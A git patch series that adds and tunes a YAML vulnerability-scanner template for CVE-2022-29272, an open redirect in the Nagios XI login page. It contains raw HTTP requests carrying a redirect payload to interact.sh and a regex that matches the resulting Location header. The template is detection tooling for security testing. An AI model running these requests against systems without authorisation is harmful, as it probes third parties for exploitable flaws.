From 4e99cf1fd63bdcea7266ecc3471f70392317a78f Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 16 Aug 2022 21:44:18 +0530
Subject: [PATCH 1/4] Create CVE-2022-29272.yaml
---
cves/2022/CVE-2022-29272.yaml | 47 +++++++++++++++++++++++++++++++++++
1 file changed, 47 insertions(+)
create mode 100644 cves/2022/CVE-2022-29272.yaml
diff --git a/cves/2022/CVE-2022-29272.yaml b/cves/2022/CVE-2022-29272.yaml
new file mode 100644
index 0000000000..696407535f
--- /dev/null
+++ b/cves/2022/CVE-2022-29272.yaml
@@ -0,0 +1,47 @@
+id: CVE-2022-29272
+
+info:
+ name: Nagios XI < 5.8.5 - Open Redirect
+ author: ritikchaddha
+ severity: medium
+ description: |
+ In Nagios XI through 5.8.5, an open redirect vulnerability exists in the login function that could lead to spoofing.
+ reference:
+ - https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-29272
+ classification:
+ cve-id: CVE-2022-29272
+ tags: cve,cve2022,redirect,nagios
+
+requests:
+ - raw:
+ - |
+ GET /nagiosxi/login.php HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
+
+ - |
+ POST /nagiosxi/login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
+
+ nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.example.com&username={{username}}&password={{password}}&loginButton=Login
+
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+ extractors:
+ - type: regex
+ part: body
+ name: nsp_token
+ group: 1
+ regex:
+ - ''
+ - ""
+ internal: true
From 7c5967828b4a5f25d687b4332ac3c1e31b2ad8d2 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 20 Aug 2022 12:28:45 +0530
Subject: [PATCH 2/4] Update CVE-2022-29272.yaml
---
cves/2022/CVE-2022-29272.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-29272.yaml b/cves/2022/CVE-2022-29272.yaml
index 696407535f..a282f8cf52 100644
--- a/cves/2022/CVE-2022-29272.yaml
+++ b/cves/2022/CVE-2022-29272.yaml
@@ -26,7 +26,7 @@ requests:
Content-Type: application/x-www-form-urlencoded
Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
- nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.example.com&username={{username}}&password={{password}}&loginButton=Login
+ nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login
redirects: true
max-redirects: 2
From da868c0fb34effaad4183f4205e80aa91f6fb20a Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 20 Aug 2022 12:45:27 +0530
Subject: [PATCH 3/4] Update CVE-2022-29272.yaml
---
cves/2022/CVE-2022-29272.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-29272.yaml b/cves/2022/CVE-2022-29272.yaml
index a282f8cf52..9a7dd10d67 100644
--- a/cves/2022/CVE-2022-29272.yaml
+++ b/cves/2022/CVE-2022-29272.yaml
@@ -16,7 +16,7 @@ info:
requests:
- raw:
- |
- GET /nagiosxi/login.php HTTP/1.1
+ GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1
Host: {{Hostname}}
Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
From 8042eb160b3c5f4d315c67942435659e4562effb Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 21 Aug 2022 14:20:07 +0530
Subject: [PATCH 4/4] Update CVE-2022-29272.yaml
---
cves/2022/CVE-2022-29272.yaml | 6 ++----
1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/cves/2022/CVE-2022-29272.yaml b/cves/2022/CVE-2022-29272.yaml
index 9a7dd10d67..f2c888a6a1 100644
--- a/cves/2022/CVE-2022-29272.yaml
+++ b/cves/2022/CVE-2022-29272.yaml
@@ -11,20 +11,18 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2022-29272
classification:
cve-id: CVE-2022-29272
- tags: cve,cve2022,redirect,nagios
+ tags: cve,cve2022,redirect,nagios,nagiosxi
requests:
- raw:
- |
GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1
Host: {{Hostname}}
- Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login
@@ -41,7 +39,7 @@ requests:
part: body
name: nsp_token
group: 1
+ internal: true
regex:
- ''
- ""
- internal: true